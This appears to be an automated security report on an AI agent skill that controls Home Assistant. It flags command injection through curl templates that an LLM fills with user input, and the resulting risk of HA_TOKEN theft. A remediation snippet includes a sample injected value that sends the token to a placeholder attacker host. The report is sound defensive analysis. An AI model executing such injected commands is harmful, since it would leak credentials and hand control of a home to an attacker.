Trust Assessment
homeassistant received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 2 high, 0 medium, and 0 low severity. Key findings include network egress to untrusted endpoints, command injection via unsanitized user input in shell commands, and data-exfiltration risk of the `HA_TOKEN` due to command injection.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Network egress to untrusted endpoints.** HTTP request to a raw IP address. Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses; legitimate API calls should use well-known service domains. | Manifest | skills/dbhurley/homeassistant/SKILL.md:9 |
| CRITICAL | **Command injection via unsanitized user input in shell commands.** The skill documentation provides `curl` command templates that include placeholders like `{domain}`, `{service}`, `{entity_id}`, and JSON payload content. If an LLM directly interpolates user-provided input into these placeholders without robust sanitization or escaping, an attacker could inject arbitrary shell commands. This could lead to remote code execution on the host system, data exfiltration (e.g., `HA_TOKEN`, environment variables, file system contents), or unauthorized actions within the Home Assistant instance. Implement strict input validation and sanitization for all user-provided parameters before constructing and executing shell commands. Prefer a dedicated HTTP client library in a language like Python or Node.js, which handles URL encoding and JSON serialization safely, instead of direct shell execution of `curl` with interpolated strings. If shell execution is unavoidable, ensure all user-controlled variables are properly escaped (e.g., using `shlex.quote` in Python) and that the command is executed with the least possible privileges. | LLM | SKILL.md:50 |
| HIGH | **Data-exfiltration risk of `HA_TOKEN` due to command injection.** The skill uses the `HA_TOKEN` environment variable, a long-lived access token for Home Assistant, in its `curl` commands. If the command injection vulnerability (SS-LLM-003) is exploited, an attacker could craft a malicious payload to exfiltrate this token to an external server. The token grants broad access to the Home Assistant instance, making its exfiltration a significant security risk. The primary remediation is to prevent command injection (SS-LLM-003). Additionally, consider revoking or rotating `HA_TOKEN`s regularly, and use tokens scoped by the principle of least privilege, granting only the permissions the skill's intended functions require. | LLM | SKILL.md:30 |
| HIGH | **Excessive permissions implied by 'Call any service' functionality.** The skill's documentation, particularly the 'Call any service' example, suggests that the `HA_TOKEN` used by the skill may have broad permissions, allowing it to invoke any Home Assistant service (`{domain}/{service}`). If the token is configured with administrative or overly permissive access, an attacker exploiting the command injection vulnerability (SS-LLM-003), or even a legitimate user, could perform unauthorized or destructive actions within the Home Assistant environment, far beyond the skill's intended scope. The skill does not specify minimum required permissions, implying a full-access token might be used. Apply the principle of least privilege: create a dedicated Home Assistant user and a long-lived access token with only the specific permissions the skill needs (e.g., `switch.turn_on`, `light.turn_on`, `scene.turn_on`), and avoid tokens with broad administrative access. | LLM | SKILL.md:50 |
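The primary remediation named in SS-LLM-003 is to replace shell `curl` with an HTTP client library that serializes JSON safely and to validate path components before use. A minimal Python sketch, assuming the standard Home Assistant REST endpoint `/api/services/{domain}/{service}`; the names `call_service`, `ALLOWED_NAME`, and `HA_URL` are illustrative, not part of the skill:

```python
import json
import os
import re
import urllib.request

# Home Assistant domain and service names are lowercase slugs; anything
# else (spaces, semicolons, slashes) is rejected before a request is built.
ALLOWED_NAME = re.compile(r"^[a-z_][a-z0-9_]*$")

def call_service(domain: str, service: str, payload: dict) -> bytes:
    """POST to /api/services/{domain}/{service}, validating inputs first."""
    if not (ALLOWED_NAME.match(domain) and ALLOWED_NAME.match(service)):
        raise ValueError(f"invalid domain/service: {domain}/{service}")
    base = os.environ.get("HA_URL", "http://homeassistant.local:8123")
    req = urllib.request.Request(
        f"{base}/api/services/{domain}/{service}",
        data=json.dumps(payload).encode(),  # library-safe JSON serialization
        headers={
            "Authorization": f"Bearer {os.environ['HA_TOKEN']}",
            "Content-Type": "application/json",
        },
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()
```

Because no shell is involved, an injected string like `light; rm -rf /` never reaches an interpreter; it simply fails validation.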
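If shell execution of `curl` genuinely cannot be avoided, the finding's `shlex.quote` suggestion looks roughly like this sketch; the `entity_id` value is a hypothetical attacker-controlled input, and the command string mirrors the skill's documented template rather than any verified code:

```python
import json
import shlex

# Attacker-controlled input attempting to break out of the payload and
# exfiltrate the token via a second command.
entity_id = "light.kitchen; curl https://evil.example/$HA_TOKEN"

# shlex.quote wraps the payload in single quotes, so the `;` stays literal
# data and `$HA_TOKEN` inside it is never expanded by the shell.
cmd = (
    "curl -s -X POST "
    '-H "Authorization: Bearer $HA_TOKEN" '
    "-H 'Content-Type: application/json' "
    f"-d {shlex.quote(json.dumps({'entity_id': entity_id}))} "
    '"$HA_URL/api/services/light/turn_on"'
)
```

Even so, quoting is a last resort: it protects the shell boundary but does nothing about an over-privileged token, which is why the least-privilege remediation in the final finding still applies.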
Scan History
Embed Code
[SkillShield report](https://skillshield.io/report/0d3ff80367d536a7)
Powered by SkillShield